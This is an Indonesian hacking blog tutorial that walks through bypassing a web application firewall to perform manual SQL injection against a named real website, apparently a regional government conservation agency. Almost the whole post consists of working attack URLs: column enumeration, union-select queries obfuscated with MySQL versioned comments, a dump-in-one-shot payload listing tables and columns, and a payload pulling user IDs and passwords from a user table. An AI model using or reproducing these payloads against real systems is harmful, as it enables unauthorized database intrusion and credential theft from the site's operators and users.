CARA BYPASS WAF 403 FORBIDDEN METODE SQL INJECTION

Assalamualaikum. Balik Lagi Nih Ama Gw ArdhyanX Oke sakarang gw bakal ngasih tutor gmn cara Bypass WAF 403 Forbidden SQL Injection Manual. Bagi yang gk tau apa itu WAF, Waf adalah Web Application Firewall yang digunakan untuk keamanan website singkatnya.

Live Target

• https://www.bksdajambi.com/berita.php?id=3

~ Setelah kalian cek apakah web tersebut vuln terhadap SQL INJECTION, kalian masukkan order by untuk mengetahui jumlah kolom web itu. Seperti contoh dibawah ini. Jika udh error angka nya turunin kalau blum error angka nya naikin seperti contoh dibawah ini

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+1--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+2--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+3--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+4--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+5--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+6--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+7--+-

• https://www.bksdajambi.com/berita.php?id=39%27+order+by+8--+-

~ Teryata cukup di angka 8 langsung saja kita union select

Contoh https://www.bksdajambi.com/berita.php?id=-39%27+union+select+1,2,3,4,5,6,7,8--+-

Dan Jangan lupa tambahkan tanda - dibelakang id dan teryata FORBIDDEN :(

Kode untuk membypass nya adalah

• /*50000...*/+/*50000...*/

• /*12345...*/+/*12345...*/

Contohnya seperti ini https://www.bksdajambi.com/berita.php?id=-39%27+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8--+-

Dan Crot :v Keluar deh angka togel nya seperti gambar di bawah ini

~ Skarang kita dios buat ngelihat database nya. Masukin make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)

Contohnya seperti ini cara memasukkanya

https://www.bksdajambi.com/berita.php?id=-39%27+/*!50000union*/+/*!50000select*/+1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) ,3,4,5,6,7,8--+-

~ Skarang kita cari user sama pass nya. Ganti kode dios tdi dengan kode ini /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@)

Contohnya seperti ini cara memasukkanya

https://www.bksdajambi.com/berita.php?id=-39%27+/*!50000union*/+/*!50000select*/+1, /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@),3,4,5,6,7,8--+-

Nah keliatan kan username sama password nya :v

Oke Sekian Dan Terima Kasih Dan Jangan Lupa Subscribe Chennel Youtube Official P5XPloiterCrew ada tutorial menarik buat kalian dan kalian juga bisa request tutorial apa yang perlu anda ketahui jangan lupa susbcribe and share

CARA BYPASS WAF 403 FORBIDDEN METODE SQL INJECTION

ArdhyanXTzy

Posting Komentar

Author Profile

Social Plugin

Popular Posts

DEFACE POC CandySKL Default Username & Password | New 2022

Mencari Celah Bug Open Redirect Vulnerability

VN FCKeditor Upload File/Shell Vulnerability

Laravel RCE Remote Code Execution | With APP_KEY (CVE - 2018 - 15133)

Labels

Product Services

Best Services

Contact form